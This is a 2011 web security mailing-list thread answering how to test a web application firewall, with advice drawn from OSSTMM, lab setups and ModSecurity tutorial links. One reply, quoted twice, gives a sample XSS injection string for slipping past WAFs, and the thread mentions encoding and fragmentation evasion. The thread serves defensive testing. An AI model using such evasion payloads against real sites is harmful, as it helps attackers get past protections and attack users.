On Sat, Oct 8, 2011 at 10:05 PM, Simone Onofri simone.onofri@gmail.com wrote:
Hi Hao,
IMHO as for methodology You can use the OSSTMM [1] which have modules
such as Active Detection Verification, task for it and tool [2] (this
is used prior testing because a filtering device can corrupts the test
result, but I think it's a good start). Please correct me if I'm wrong
with this mapping.
Considering the WAF as an Authentication Control (via whitelis) and
also Alarm (if it has this functions) and Non-Repudiation (if
maintains logs and/or send data to a SIM/SIEM or other Log Management
system). It may be a good idea to check also these, for a complete
test, not only checking for bypassing.
So how to run the tasks depends on the vector and test type and your
reason to test, even if OSSTMM said "It may be necessary to coordinate
these tests with the appropriate persons within the scope.".
If you have access to Web Application Firewall/Webserver logs you can
check for requests passed or not, otherwise if You have no access to
logs You may "tune" the script in order to recognize if a request is
blocked or not (for example, dropped packets, specific or generic HTTP
errors, WSOD... depends on WAF used). Testing in a "lab" attacker ->
WAF -> test-webserver is the best.
Depending on WAF type and techniques used (regular expression and so
on...) it's also possible to use a custom script in order to:
- crawl the application, looking for pages and parameters
- tune the script
- send sample attacks, looking for reactions
- you may also elaborate attacks with evasion techniques (there are a
lot of papers... from packets fragmentation to encoding)
another interesting, inspired by this thread [3] test is the HTTP
Parameter Pollution [4].
Now You have "raw" output with requests passed and not. This output
can be analyzed (on parameters, attack type and/or evasion techniques)
in order to get some conclusion about how and when WAF works.
Note depending on WAF type you may found a filtering on a layer 7,
also with custom rules for each parameter or in a lower layer, with
different characteristics. Also note a WAF can be configured to
proactively blocks the attacker, compromising Your test (reactions
must be deactivated for test).
Cheers,
Simone
[1] http://www.isecom.org/osstmm/
[2] http://www.purehacking.com/news/afd-technical-details
[3] http://seclists.org/pen-test/2010/Sep/3
[4] https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
On Sat, Oct 8, 2011 at 10:43 AM, Hao Wang (haowa2) haowa2@cisco.com wrote:
Hi All,
Do you know some material about how to test a WAF and write a testing report? I wish there are some examples, could you help?
Regards,
-Hao
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
I would say that a real world way to test a WAF is to test a web
application first. Then, put the Web Application Firewall in front of
it, then test again. This time, If you can't find any of the
vulnerabilities that you found before then the WAF is probably doing
an ok job.
Take into consideration that most WAFs will block out of the box
scanning, but will fail on simple variations of injections.
Here is a good inject for XSS against WAFs:
<input oninput%3d"">
I personally don't trust most WAFs to block more than just automated
scanning, and isn't a cure for vulnerabilities in your sites code.
@superevr
On Oct 8, 2011, at 10:47 AM, "Hao Wang (haowa2)" haowa2@cisco.com wrote:
Hi All,
Do you know some material about how to test a WAF and write a testing report? I wish there are some examples, could you help?
Regards,
-Hao
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
Hi all,
I did a presentation at AppSec USA Washington 2010 about Open Source
WAF. I was then turning a standard Apache Server into a Reverse-Proxy
and then into a WAF. Everything was/is prepared for the participants on
a LiveCD. Everything is available as video tutorial.
Videos showing all steps (From Apache to WAF with mod_security)
https://www.hacking-lab.com/news/newspage/open-source-entry-server.html
For your question how to proceed
a) download and install vulnerable web app
b) setup WAF
c) Configure your WAF for a)
Enjoy!
Some more Videos based on the same technique:
PART 1: Howto Create WAF in front of Facebook
http://media.hacking-lab.com/movies/rp2/
PART 2: Howto Create WAF in front of Facebook
http://media.hacking-lab.com/movies/rp2.2/
Regards
Ivan
-----Original Message-----
From: websecurity-bounces@lists.webappsec.org
[mailto:websecurity-bounces@lists.webappsec.org] On Behalf Of super evr
Sent: Sonntag, 9. Oktober 2011 02:58
To: Hao Wang (haowa2)
Cc: websecurity@webappsec.org
Subject: Re: [WEB SECURITY] WAF testing
I would say that a real world way to test a WAF is to test a web
application first. Then, put the Web Application Firewall in front of
it, then test again. This time, If you can't find any of the
vulnerabilities that you found before then the WAF is probably doing
an ok job.
Take into consideration that most WAFs will block out of the box
scanning, but will fail on simple variations of injections.
Here is a good inject for XSS against WAFs:
<input oninput%3d"">
I personally don't trust most WAFs to block more than just automated
scanning, and isn't a cure for vulnerabilities in your sites code.
@superevr
On Oct 8, 2011, at 10:47 AM, "Hao Wang (haowa2)" haowa2@cisco.com
wrote:
Hi All,
Do you know some material about how to test a WAF and write a testing
report? I wish there are some examples, could you help?
Regards,
-Hao
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.
org
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.
org